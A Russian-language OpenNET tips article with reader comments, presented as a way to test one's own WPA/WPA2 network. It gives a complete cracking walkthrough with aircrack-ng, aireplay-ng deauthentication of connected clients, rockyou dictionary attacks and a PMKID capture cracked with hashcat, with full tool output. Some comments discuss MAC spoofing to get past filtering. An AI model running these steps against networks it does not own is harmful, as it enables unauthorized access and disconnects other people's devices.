The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

Проверка безопасности беспроводной сети WPA/WPA2 при помощи Aircrack-ng и Hashcat
Беспроводные сети на базе WPA/WPA2 не подвержены прямым методам атаки, но
злоумышленник может получить доступ к системам, на которых установлен
недостаточно надёжный пароль. Нижеприведённая инструкция позволяет проверить
свои системы на предмет стойкости к атаке по типовому словарю паролей.
Предлагается два метода восстановления пароля по перехваченному в трафике хэшу
- при помощи  Aircrack-ng и  Hashcat.

Устанавливаем Aircrack-ng:

   sudo apt-get install aircrack-ng

Определяем, поддерживает ли беспроводная карта режим мониторинга
(http://aircrack-ng.org/doku.php?id=compatible_cards - выбор поддерживаемых
плат), на выходе будет список сетевых интерфейсов для которых имеется подобная поддержка:

   airmon-ng

Переводим беспроводную плату в режим мониторинга:

   airmon-ng start wlan0

Отслеживаем все проходящие в эфире кадры на предмет идентификаторов
беспроводной сети (BSSID)  и используемых номеров каналов.

   airodump-ng mon0

   BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
   9C:5E:8A:C9:AB:C0  -81       19        0    0   6  54e  WPA2 CCMP   PSK  mywifi
   ...

Определив, что наша сеть имеет BSSID 9C:5E:8A:C9:AB:C0 и 6 канал, отслеживаем и
сохраняем в файл capture/-01.cap трафик пакетов, связанных с согласованием
нового соединения (ждём пока появится надпись "WPA handshake" и прерываем
перехват по ctrl-c):

   airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 -w capture/ mon0

Для того, чтобы не ждать долго инициируем обрыв соединения у подключенных
клиентов (64:BC:0C:49:87:F7 - идентификатор клиента):

   airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 mon0

   BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                 
   9C:5E:8A:C9:AB:C0  64:BC:0C:49:87:F7  -37    1e- 1e     4     6479  ASUS

   aireplay-ng -0 10 -a 9C:5E:8A:C9:AB:C0 -c 64:BC:0C:49:87:F7 mon0


Загружаем  словарь с примерами паролей (размер 134MB, около 14 млн типовых паролей):

   curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Запускаем  aircrack-ng в режиме подбора хэша пароля по словарю (подбор
выполняется только на CPU, без привлечения GPU):

   aircrack-ng -a2 -b 9C:5E:8A:C9:AB:C0 -w rockyou.txt capture/-01.cap

Или используем для этого naive-hashcat (более эффективен при наличии доступа
к GPU), предварительно преобразовав cap-дамп в формат hccapx при помощи утилиты
cap2hccapx:

   cap2hccapx.bin capture/-01.cap capture/-01.hccapx
   HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh



Дополнение: 

Опубликован новый  метод атаки, 
который не требует ожидания подключения к сети нового пользователя и сохранения всей активности, 
связанной с установкой им соединения. Для получения данных, достаточных для начала 
подбора пароля, новый метод требует перехвата лишь одного кадра, который можно получить 
в любое время, отправив запрос аутентификации к точке доступа. 

Для проведения атаки требуются свежие версии:
* hcxdumptool
* hcxtools
* hashcat


Запускаем hcxdumptool, отправляем запрос к точке доступа для получения PMKID 
и сохраняем результат в файл в формате pcapng:

   ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

    start capturing (stop with ctrl+c)
    INTERFACE:...............: wlp39s0f3u4u5
    FILTERLIST...............: 0 entries
    MAC CLIENT...............: 89acf0e761f4 (client)
    MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
    EAPOL TIMEOUT............: 20000
    DEAUTHENTICATIONINTERVALL: 10 beacons
    GIVE UP DEAUTHENTICATIONS: 20 tries
    REPLAYCOUNTER............: 62083
    .... 
    [13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e  [ASSOCIATIONREQUEST, SEQUENCE 4]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

В случае если точка доступа поддерживает отправку PMKID будет выведено сообщение "FOUND PMKID". 
Из-за помех перехват может не получиться с первого раза, поэтому рекомендуется 
запускать hcxdumptool в течение приблизительно 10 минут.

Запускаем утилиту hcxpcaptool для преобразования перехваченного дампа из
формата pcapng в формат для разбора в hashcat.


   ./hcxpcaptool -z test.16800 test.pcapng

    start reading from test.pcapng

    summary:
    --------
    file name....................: test.pcapng
    file type....................: pcapng 1.0
    file hardware information....: x86_64
    file os information..........: Linux 4.17.11-arch1
    file application information.: hcxdumptool 4.2.0
    network type.................: DLT_IEEE802_11_RADIO (127)
    endianess....................: little endian
    read errors..................: flawless
    packets inside...............: 66
    skipped packets..............: 0
    packets with FCS.............: 0
    beacons (with ESSID inside)..: 17
    probe requests...............: 1
    probe responses..............: 11
    association requests.........: 5
    association responses........: 5
    authentications (OPEN SYSTEM): 13
    authentications (BROADCOM)...: 1
    EAPOL packets................: 14
    EAPOL PMKIDs.................: 1

    1 PMKID(s) written to test.16800

Содержимое записанного файла включает строки вида
"2582a81d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465af3a", которые содержат 
шестнадцатеричные значения PMKID, MAC AP,MAC Station и ESSID.

Дополнительно при запуске hcxpcaptool можно использовать опции "-E", "-I" и '-U" 
для анализа наличия паролей, идентификаторов и имён пользователей в беспроводном трафике:


   ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Запускаем hashcat для подбора пароля (применяется режим 16800):


   ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

    hashcat (v4.2.0) starting...

    OpenCL Platform #1: NVIDIA Corporation
    ======================================
    * Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
    * Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

    Hashes: 1 digests; 1 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

    Applicable optimizers:
    * Zero-Byte
    * Single-Hash
    * Single-Salt
    * Brute-Force
    * Slow-Hash-SIMD-LOOP

    Minimum password length supported by kernel: 8
    Maximum password length supported by kernel: 63

    Watchdog: Temperature abort trigger set to 90c

    2582573161c61*4604d4e*89acf0e761f4*ed4824639f3a:hashcat!

    Session..........: hashcat
    Status...........: Cracked
    Hash.Type........: WPA-PMKID-PBKDF2
    Hash.Target......: 2582a8281d0e61c61*4604ba734d4e*89acf...a39f3a
    Time.Started.....: Sun Aug 12 12:51:38 2018 (41 secs)
    Time.Estimated...: Sun Aug 12 12:52:19 2018 (0 secs)
    Guess.Mask.......: ?l?l?l?l?l?lt! [8]
    Guess.Queue......: 1/1 (100.00%)
    Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#*.....:  1641.3 kH/s
    Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
    Progress.........: 66846720/308915776 (21.64%)
    Rejected.........: 0/66846720 (0.00%)
    Restore.Point....: 0/11881376 (0.00%)
    Candidates.#1....: hariert! -> hhzkzet!
    Candidates.#2....: hdtivst! -> hzxkbnt!
    Candidates.#3....: gnxpwet! -> gwqivst!
    Candidates.#4....: gxhcddt! -> grjmrut!
    HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
    HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
    HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
    HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1
 
25.07.2017 , Источник: https://github.com/brannondorsey/wi...
Ключи: wpa, wpa2, wifi, aircrack-ng, hashcat / Лицензия: CC-BY
Раздел:    Корень / Администратору / Сетевая подсистема, маршрутизация / Wifi, настройка беспроводного доступа

Обсуждение [ Линейный режим | Показать все | RSS ]
 
  • 1.5, Аноним (5), 02:44, 27/07/2017 [ответить] [показать ветку] [···]    [к модератору]
  • +/
    Просмотрел что пользуются паролями по словарю, дальше не интересно) Мои 25 не подберут. хотя недавно пришлось к сети подключать принтер, за...ся пока вбил пароль.
     
     
  • 2.6, cmp (ok), 06:28, 27/07/2017 [^] [ответить]    [к модератору]
  • +/
    Хе, а у меня 32 - мд5 какой-то лабуды, ноут проще проводом воткнуть и скопировать, а на телефон смс отправить
     
     
  • 3.7, PuskatelSheptunov (?), 00:03, 28/07/2017 [^] [ответить]    [к модератору]
  • +/
    я параноик? у меня 63, или вы из соседних палат?
     
     
  • 4.23, sabakka (?), 23:44, 01/09/2017 [^] [ответить]    [к модератору]
  • +/
    у меня 20см.
     
  • 4.25, Аноним (-), 13:18, 21/09/2017 [^] [ответить]    [к модератору]
  • +/
    Мы с вами из одной палаты, коллега.
     
  • 4.27, Аноним (-), 13:30, 15/10/2017 [^] [ответить]    [к модератору]  
  • +/
    А у меня 64 символа...
     
  • 2.8, AdVv (ok), 10:21, 28/07/2017 [^] [ответить]    [к модератору]  
  • +/
    > Просмотрел что пользуются паролями по словарю, дальше не интересно) Мои 25 не
    > подберут. хотя недавно пришлось к сети подключать принтер, за...ся пока вбил
    > пароль.

    Главное WPS не выключайте !

     
  • 1.9, 123 (??), 04:11, 31/07/2017 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Ставим пароль 12345678 и лочим по макам устройства. Хоть и есть в словаре, но отсеим 95% хакеров-любителей.
     
     
  • 2.10, Аноним (-), 09:25, 02/08/2017 [^] [ответить]    [к модератору]  
  • +/
    ты идиот? там видно при скане маки подключеных устройств, я могу твой мак вписать себе, вот ты лох.
     
  • 2.11, Аноним (-), 08:35, 04/08/2017 [^] [ответить]     [к модератору]  
  • +/
    Если бы ты хоть что-то понимал в безопасности то догадался бы что сменить мак зн... весь текст скрыт [показать]
     
     
  • 3.12, Аноним (-), 21:55, 04/08/2017 [^] [ответить]    [к модератору]  
  • +/
    Речь о хакерах любителях же. ну улыбнитесь хоть.
    Вот ты будешь подменять маки устройств в сети во время перебора паролей? Сеть будет лагать, люди будут дергать шнур роутера и т д.
     
     
  • 4.18, Аноним (-), 22:03, 21/08/2017 [^] [ответить]    [к модератору]  
  • +/
    Ты не поверишь - сканить будут днём, а подменять мак ночью.
     
  • 4.22, Аноним (-), 04:42, 28/08/2017 [^] [ответить]     [к модератору]  
  • +/
    Если сеть по другому не пускает - без вариантов Зависит требуется ли скрытность... весь текст скрыт [показать]
     
  • 1.13, Аноним (-), 21:57, 04/08/2017 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Огласите время перебора среднего пароля из 10 символов на квантовом компьютере, а то не усну.
    Как заставить точку допускать одну аунтификацию в секунду, например? Микротик может?
     
     
  • 2.14, Anonimous (?), 22:58, 07/08/2017 [^] [ответить]    [к модератору]  
  • +/
    Можно в metarouter поднять openwrt/lede с radius и поставить ему ограничения.
     
     
  • 3.28, MatrixHasYou (?), 07:17, 10/11/2017 [^] [ответить]    [к модератору]  
  • +/
    > Можно в metarouter поднять openwrt/lede с radius и поставить ему ограничения.

    Ага, а можно в вашей Виндовс поставить виртуалбокс и поднять там хакинтош чтобы ткнуть на красивую иконочку.

    ps вы все равно не поймете, но как раз над кнопочкой metarouter есть кнопочка radius коли он вам так нужен

     
  • 2.15, Аноним (-), 03:27, 17/08/2017 [^] [ответить]    [к модератору]  
  • +/
    Ну что, все еще не уснул?
     
     
  • 3.19, Аноним (-), 22:04, 21/08/2017 [^] [ответить]    [к модератору]  
  • +/
    > Ну что, все еще не уснул?

    Давайте не дадим спать болезному полгода? Пусть он примет книгу рекордов.

     
     
  • 4.26, ыпр (?), 18:21, 14/10/2017 [^] [ответить]    [к модератору]  
  • +/
    внутривенно? :)
     
  • 1.16, Kuromi (?), 01:20, 19/08/2017 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    "Переводим беспроводную плату в режим мониторинга:

       airmon-ng start wlan0"

    Ага, а что, любую карту так можно? раньше помнится были списки чипсетов которые такое позволяли...

     
     
  • 2.20, Аноним (-), 22:05, 21/08/2017 [^] [ответить]    [к модератору]  
  • +/
    > Ага, а что, любую карту так можно?

    Любую из списка. Ты новость вообще читал?

     
  • 1.17, лютый жабист__ (?), 08:33, 20/08/2017 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    Спасибо за статью! Не знал, что так всё просто.
     
     
  • 2.21, Аноним (21), 22:51, 23/08/2017 [^] [ответить]    [к модератору]  
  • +/
    а слабо было "iwconfig wlan0 mode Monitor" попробовать ? Тут нелинуксоиды вопросы оставляют с хитрым словом "чипсет" ???
     
  • 2.24, Аноним (-), 18:35, 10/09/2017 [^] [ответить]    [к модератору]  
  • +/
    > Не знал, что так всё просто.

    Знал, что так всё не просто.

     
     
  • 3.29, Аноним (29), 13:42, 12/08/2018 [^] [ответить]    [к модератору]  
  • +/
    Знал, что не всё так просто.
     

    Ваш комментарий
    Имя:         
    E-Mail:      
    Заголовок:
    Текст:



      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor